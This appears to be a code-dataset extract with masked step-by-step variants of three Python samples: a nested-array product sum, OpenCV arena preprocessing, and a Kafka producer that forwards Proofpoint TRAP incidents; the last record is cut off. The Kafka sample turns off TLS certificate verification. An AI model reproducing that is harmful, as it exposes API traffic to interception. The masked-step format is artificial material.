code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
"""
- input: is a 'special' array (heavily nested array)
- output: return the product sum
- notes:
- special array is a non-empty array that contains either integers or other 'special' arrays
- product sum of a special array is the sum of its elements, where 'special' arrays inside are summed themselves and then multipled by their level of depth
- logic:
- need two variables the sum and the depth; the depth will be passed on from function call to function call
- we iterate through the 'special' array
- check if it is a type int
- add to the sum
- else the element we are currently on is a 'special' array
- add to the sum the return value of recursively calling the function passing in the element and the current depth + 1
- return sum
"""
def product_sum(array):
sum = 0
depth = 1
sum += product_sum_helper(array, depth)
return sum
def product_sum_helper(array, depth):
sum = 0
for ele in array:
if type(ele) is int:
sum += ele
else:
sum += product_sum_helper(ele, depth + 1)
return depth * sum
# Time Complexity: O(n), where n is the number of nodes in the element
# Space Complexity: O(d), where d is the greatest depth of the 'special' arrays in the array
|
normal
|
{
"blob_id": "87e5a615157db59d1eac4967c321829c878d00a5",
"index": 2234,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef product_sum_helper(array, depth):\n sum = 0\n for ele in array:\n if type(ele) is int:\n sum += ele\n else:\n sum += product_sum_helper(ele, depth + 1)\n return depth * sum\n",
"step-3": "<mask token>\n\n\ndef product_sum(array):\n sum = 0\n depth = 1\n sum += product_sum_helper(array, depth)\n return sum\n\n\ndef product_sum_helper(array, depth):\n sum = 0\n for ele in array:\n if type(ele) is int:\n sum += ele\n else:\n sum += product_sum_helper(ele, depth + 1)\n return depth * sum\n",
"step-4": "\"\"\"\n- input: is a 'special' array (heavily nested array)\n- output: return the product sum\n- notes:\n - special array is a non-empty array that contains either integers or other 'special' arrays\n - product sum of a special array is the sum of its elements, where 'special' arrays inside are summed themselves and then multipled by their level of depth\n- logic:\n - need two variables the sum and the depth; the depth will be passed on from function call to function call\n - we iterate through the 'special' array\n - check if it is a type int\n - add to the sum\n - else the element we are currently on is a 'special' array\n - add to the sum the return value of recursively calling the function passing in the element and the current depth + 1\n - return sum\n\"\"\"\n\n\ndef product_sum(array):\n sum = 0\n depth = 1\n sum += product_sum_helper(array, depth)\n return sum\n\n\ndef product_sum_helper(array, depth):\n sum = 0\n\n for ele in array:\n if type(ele) is int:\n sum += ele\n else:\n sum += product_sum_helper(ele, depth + 1)\n\n return depth * sum\n\n\n# Time Complexity: O(n), where n is the number of nodes in the element\n# Space Complexity: O(d), where d is the greatest depth of the 'special' arrays in the array\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
* Team Id : LM#4787
* Author List : Arjun S, Vinod, Arvind, Vishnu
* Filename: ArenaPreprocessor.py
* Theme: Launch A Module
* Functions: arena_preprocess, getTransformationMatrix, get_robot_space
* Global Variables: None
"""
import cv2
import numpy as np
"""
* Function Name: getTransformationMatrix
* Input: frame - (raw camera feed of the arena)
* Output: perspective transformation matrix
* Logic: Uses image processing techniques and finds contours for outer border to
get transformation matrix
Each process is explained in the function
* Example Call: M = getTransformationMatrix(frame)
"""
def getTransformationMatrix(frame):
# # flips Horizontally and Vertically: Depends on Camera Setup
# arena = cv2.flip(frame, -1)
# Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
# To Grayscale
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
# Increase Contrast: for better border detection
processed_arena = cv2.equalizeHist(processed_arena)
# Adaptive Threshold to get black thick boundary: (Used over Threshold: for lighting consideration1)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255,
cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,
31, 5)
# Morphological Operations: to remove noise
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
# Contour Detection
(contours, heirarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# Getting the contour of interest: inner edge and outer edge of the box- largest and second largest contour
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
# Approximating to get corners of the quadrilaterals
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
# Define result dimensions (600 X 900) therefore each block 100 X 100
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
# Sort the detected corners to align with result corners
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]
# corner blocks are less than 8 inches: block + center of border = 8in
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
# cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)
# cv2.imshow('Display'. frame)
# cv2.waitKey(0)
# For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)
# Get transformation matrix
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
"""
* Function Name: arena_preprocess
* Input: image - (raw camera feed of the arena)
* Output: processed_arena, warped_arena
* Logic: Multiple openCV tricks are used to make the raw camera feed
as close to ideal image as possible
Each process is explained in the function
* Example Call: arena_preprocess(frame, M)
"""
def arena_preprocess(frame, M):
# Remapping to final desired result image
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
# Make the excess black border White: ~10px thick
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
warped_arena = processed_arena.copy();
# Warped_arena: to be used for robot tracking
# Denoising: bilateral filter
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
# To Make Background White:
# 1) Invert
arena_inv = cv2.bitwise_not(processed_arena)
# 2) Subtract
processed_arena = cv2.subtract(arena_inv, processed_arena)
# 3) Invert
processed_arena = cv2.bitwise_not(processed_arena)
# # Color Enhancement: Does Not Help in color detection
# ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)
# y, cr, cb = cv2.split(ycrcb)
# cv2.equalizeHist(y, y)
# ycrcb = cv2.merge((y, cr, cb))
# processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)
#
# # Shadow Removal- Not Used since Removes Shape Detail
# shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
# ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)
# shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)
# processed_arena = cv2.add(processed_arena, shadow)
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
# Show Grid Lines
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# processed_arena: to be used for Object Detection
return processed_arena, warped_arena
"""
* Function Name: get_robot_space
* Input: frame - (raw camera feed of the arena)
* Output: warped portion of arena
* Logic: Warps a portion of the arena to which the robot position
is mapped to avoid parallax
* Example Call: robot_space = get_robot_space(frame)
"""
def get_robot_space(frame):
# Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)
frame = cv2.bilateralFilter(frame, 5, 99, 198)
# Define result dimensions (600 X 900) therefore each block 100 X 100
source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]]) #(576, 65) # 53,71 (53, 400) (586, 390)
# Define result dimensions (600 X 900) therefore each block 100 X 100
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
# Get transformation matrix
M = cv2.getPerspectiveTransform(source_pts, result_pts)
# Remapping to final desired result image
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
# Show Grid Lines
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
|
normal
|
{
"blob_id": "228852f960e9343d9f45abdd3204cfab7bb54bc6",
"index": 8230,
"step-1": "<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-4": "<mask token>\nimport cv2\nimport numpy as np\n<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-5": "\"\"\"\n* Team Id : LM#4787\n* Author List : Arjun S, Vinod, Arvind, Vishnu\n* Filename: ArenaPreprocessor.py\n* Theme: Launch A Module\n* Functions: arena_preprocess, getTransformationMatrix, get_robot_space\n* Global Variables: None\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\n\"\"\"\n* Function Name: getTransformationMatrix\n* Input: frame - (raw camera feed of the arena)\n* Output: perspective transformation matrix\n* Logic: Uses image processing techniques and finds contours for outer border to\n get transformation matrix\n Each process is explained in the function\n* Example Call: M = getTransformationMatrix(frame)\n\"\"\"\n\ndef getTransformationMatrix(frame):\n # # flips Horizontally and Vertically: Depends on Camera Setup\n # arena = cv2.flip(frame, -1)\n\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # To Grayscale\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n\n # Increase Contrast: for better border detection\n processed_arena = cv2.equalizeHist(processed_arena)\n\n # Adaptive Threshold to get black thick boundary: (Used over Threshold: for lighting consideration1)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,\n 31, 5)\n\n # Morphological Operations: to remove noise\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n\n # Contour Detection\n (contours, heirarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n # Getting the contour of interest: inner edge and outer edge of the box- largest and second largest contour\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n\n # Approximating to get corners of the quadrilaterals\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Sort the detected corners to align with result corners\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]\n\n # corner blocks are less than 8 inches: block + center of border = 8in\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n\n # cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)\n # cv2.imshow('Display'. frame)\n # cv2.waitKey(0)\n # For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n return M\n\n\n\"\"\"\n* Function Name: arena_preprocess\n* Input: image - (raw camera feed of the arena)\n* Output: processed_arena, warped_arena\n* Logic: Multiple openCV tricks are used to make the raw camera feed\n as close to ideal image as possible\n Each process is explained in the function\n* Example Call: arena_preprocess(frame, M)\n\"\"\"\n\ndef arena_preprocess(frame, M):\n # Remapping to final desired result image\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Make the excess black border White: ~10px thick\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n warped_arena = processed_arena.copy();\n # Warped_arena: to be used for robot tracking\n # Denoising: bilateral filter\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n\n # To Make Background White:\n # 1) Invert\n arena_inv = cv2.bitwise_not(processed_arena)\n # 2) Subtract\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n # 3) Invert\n processed_arena = cv2.bitwise_not(processed_arena)\n\n # # Color Enhancement: Does Not Help in color detection\n # ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)\n # y, cr, cb = cv2.split(ycrcb)\n # cv2.equalizeHist(y, y)\n # ycrcb = cv2.merge((y, cr, cb))\n # processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)\n #\n # # Shadow Removal- Not Used since Removes Shape Detail\n # shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n # ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)\n # shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)\n # processed_arena = cv2.add(processed_arena, shadow)\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # processed_arena: to be used for Object Detection\n return processed_arena, warped_arena\n\n\n\"\"\"\n* Function Name: get_robot_space\n* Input: frame - (raw camera feed of the arena)\n* Output: warped portion of arena\n* Logic: Warps a portion of the arena to which the robot position\n is mapped to avoid parallax\n* Example Call: robot_space = get_robot_space(frame)\n\"\"\"\n\n\ndef get_robot_space(frame):\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]]) #(576, 65) # 53,71 (53, 400) (586, 390)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n # Remapping to final desired result image\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n\n return warped_arena\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class Producer:
def __init__(self, topic):
kafka_uname = os.environ['KAFKA_USERNAME']
kafka_pwd = os.environ['KAFKA_PASSWORD']
kafka_hosts = os.environ['KAFKA_HOSTS']
ssl_truststore_file = '/opt/scripts/ca-cert.cer'
self.topic_name = topic
self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,
compression_type='snappy', retries=5, linger_ms=200, batch_size
=1000, request_timeout_ms=100000, sasl_plain_username=
kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=
'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=
ssl_truststore_file, api_version=(0, 10, 1))
def produce_message(self, message):
self.producer.send(self.topic_name, message)
def close(self):
self.producer.flush()
self.producer.close()
logger.info('closed')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Producer:
def __init__(self, topic):
kafka_uname = os.environ['KAFKA_USERNAME']
kafka_pwd = os.environ['KAFKA_PASSWORD']
kafka_hosts = os.environ['KAFKA_HOSTS']
ssl_truststore_file = '/opt/scripts/ca-cert.cer'
self.topic_name = topic
self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,
compression_type='snappy', retries=5, linger_ms=200, batch_size
=1000, request_timeout_ms=100000, sasl_plain_username=
kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=
'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=
ssl_truststore_file, api_version=(0, 10, 1))
def produce_message(self, message):
self.producer.send(self.topic_name, message)
def close(self):
self.producer.flush()
self.producer.close()
logger.info('closed')
def set_creds():
secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',
'password', 'kafka_hosts'])
os.environ['KAFKA_USERNAME'] = secrets['username']
os.environ['KAFKA_PASSWORD'] = secrets['password']
os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']
def run_kafka_producer_job(logs, topic_name):
set_creds()
producer = Producer(topic=topic_name)
logger.info('producer created')
try:
for l in logs:
to_send = json.dumps(l)
producer.produce_message(to_send.encode())
except Exception as e:
logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'
)
raise e
finally:
producer.close()
def pull_pp_trap_logs(minutes_before):
logger.info('retrieving secrets for pp_trap')
current_time = datetime.datetime.utcnow()
if minutes_before > 0:
current_time = current_time - datetime.timedelta(minutes=minutes_before
)
fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
qs = {'created_after': twenty_minutes_ago, 'created_before':
fifteen_minutes_ago, 'expand_events': 'false'}
try:
r = requests.get('https://10.47.172.28/api/incidents', params=qs,
headers={'Authorization': prod.pp_trap_api_key}, verify=False)
print(r.status_code)
json_object = r.json()
print(json_object)
return json_object
except Exception as e:
sns.generate_sns('proofpoint_trap')
logger.error(f'Error for TRAP API call: {str(e)}')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger.setLevel('INFO')
<|reserved_special_token_0|>
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
class Producer:
def __init__(self, topic):
kafka_uname = os.environ['KAFKA_USERNAME']
kafka_pwd = os.environ['KAFKA_PASSWORD']
kafka_hosts = os.environ['KAFKA_HOSTS']
ssl_truststore_file = '/opt/scripts/ca-cert.cer'
self.topic_name = topic
